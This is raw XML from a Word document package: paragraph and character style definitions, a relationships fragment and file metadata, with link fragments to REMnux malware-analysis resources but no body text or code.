  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00566DA9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableHeading">
    <w:name w:val="Table Heading"/>
    <w:qFormat/>
    <w:rsid w:val="00F84035"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="PreformattedText">
    <w:name w:val="Preformatted Text"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00235887"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:eastAsia="Droid Sans" w:hAnsi="Liberation Mono" w:cs="Liberation Mono"/>
      <w:color w:val="00000A"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="InternetLink">
    <w:name w:val="Internet Link"/>
    <w:rsid w:val="009539CD"/>
    <w:rPr>
      <w:color w:val="000080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TextBody">
    <w:name w:val="Text Body"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009539CD"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:after="140" w:line="288" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="Droid Sans" w:hAnsi="Liberation Serif" w:cs="FreeSans"/>
      <w:color w:val="00000A"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableContents">
    <w:name w:val="Table Contents"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="009539CD"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="Droid Sans"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032989"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Consoleinput">
    <w:name w:val="Console input"/>
    <w:basedOn w:val="TextBody"/>
    <w:qFormat/>
    <w:rsid w:val="000439CA"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SourceCode">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="001C38F4"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Droid Sans" w:hAnsi="Courier New" w:cs="FreeSans"/>
      <w:color w:val="00000A"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Quotation">
    <w:name w:val="Quotation"/>
    <w:qFormat/>
    <w:rsid w:val="00AD3443"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:rsid w:val="00895D90"/>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character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:rsid w:val="00895D90"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="Droid Sans" w:hAnsi="Liberation Serif" w:cs="FreeSans"/>
      <w:color w:val="00000A"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ConsoleInput0">
    <w:name w:val="Console Input"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00895D90"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Droid Sans" w:hAnsi="Courier New" w:cs="FreeSans"/>
      <w:b/>
      <w:color w:val="00000A"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BD6DFC"/>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D87D1A"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CodeBlock">
    <w:name w:val="CodeBlock"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00762798"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="120" w:after="120"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Body">
    <w:name w:val="Body"/>
    <w:rsid w:val="00F513D3"/>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lang w:val="en-CA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="Bullets">
    <w:name w:val="Bullets"/>
    <w:rsid w:val="005927A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832337767">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 w:id="18496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etsim.org/"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s://zeltser.com/remnux-malware-analysis-tips/"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Mnux.org/doc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_rels/header3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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A82FF-1B6C-41F4-A976-7C72E8EA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206</TotalTime>
  <Pages>20</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coleton sanheim</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <cp:lastPrinted>2016-05-26T19:36:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-13T15:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-30T01:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>